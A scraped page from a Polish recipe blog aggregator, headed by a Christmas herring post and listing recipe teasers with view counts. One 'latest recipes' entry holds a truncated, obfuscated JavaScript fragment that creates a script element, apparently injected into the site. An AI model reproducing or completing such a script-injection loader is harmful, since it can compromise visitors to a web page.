Świąteczny śledź w trzech odsłonach
Źródło: http://www.kulinarneprzygodygatity.pl/2020/12/swiateczny-sledz-w-trzech-odslonach.html
Nie wyobrażam sobie świąt Bożego Narodzenia bez ryb. Wiadomo, że to one są jednym z bohaterów Wigilii, ale jemy je także w pozostałe świąteczne dni. Goszczą one na naszym stole w kilku odsłonach i smakach. Wśród nich wyróżnia się śledź, zdecydowanie jest go najwięcej, bo i sposobów na jego przygotowanie jest mnóstwo. Ryba ta to doskonała alternatywa dla karpia. Ale...
Najnowsze przepisy
Druga nieco inna propozycja fit makowca, którego robi się... ⇖ 5
Śledzie gajowego z suszonymi borowikami (po myśliwsku)Są... ⇖ 21
(function(){ ak45=document.createElement("script");ak45_="o" ⇖ 13
Przepisy z bloga
Karp w galarecie - tradycyjny przepis Karp w galarecie -... ⇖ 50
Błyskawiczny piernik z polewą czekoladową Błyskawiczny... ⇖ 57
Pasta pieczarkowa z jajkiem Pasta pieczarkowa z jajkiem -... ⇖ 64
Pieczona pierś z indyka z przyprawami Pieczona pierś z... ⇖ 68
Seromakowiec - wersja uproszczonaSeromakowiec - prosty... ⇖ 77
Ekspresowa masa makowa z bakaliami Ekspresowa masa makowa... ⇖ 65
Jesienny sernik dyniowyJesienny sernik dyniowy - prosty... ⇖ 78
Rydze - Gatita w Pytaniu na ŚniadanieRydze, to grzyby,... ⇖ 79
Rydze smażone z cebulą i czosnkiem Rydze smażone z... ⇖ 75
Scarpaccia, włoski placek z cukinii Scarpaccia, włoski... ⇖ 91
Carpaccio z arbuza z fetą Carpaccio z arbuza z fetą -... ⇖ 144
Przepisy na czasie
Masz ochotę na coś słodkiego bez pieczenia? Zrób sernik... ⇖ 1820
Piernik przekładany kremem to jedno z tych ciast, które... ⇖ 1194
NAJLEPSZY PRZEPIS NA CIASTO NA PIEROŻKIBardzo lubię... ⇖ 711
To niezwykle proste ciasto piernikowe, które zawsze się... ⇖ 698
Cześć! Dzisiaj robimy ciasto lion bez pieczenia, to... ⇖ 614
Sernik łaciaty z brzoskwiniami i makiem to ciasto, które... ⇖ 603
Kremowe, delikatne ciasto z białą czekoladą i cukierkami... ⇖ 566
Przepyszny domowy pasztet do smarowania. W sklepie tak... ⇖ 491
Pyszny, mięciutki i delikatny. Idealne na półmisek... ⇖ 488
Paszteciki z mięsem, z ciasta drożdżowo-kruchego to... ⇖ 469









































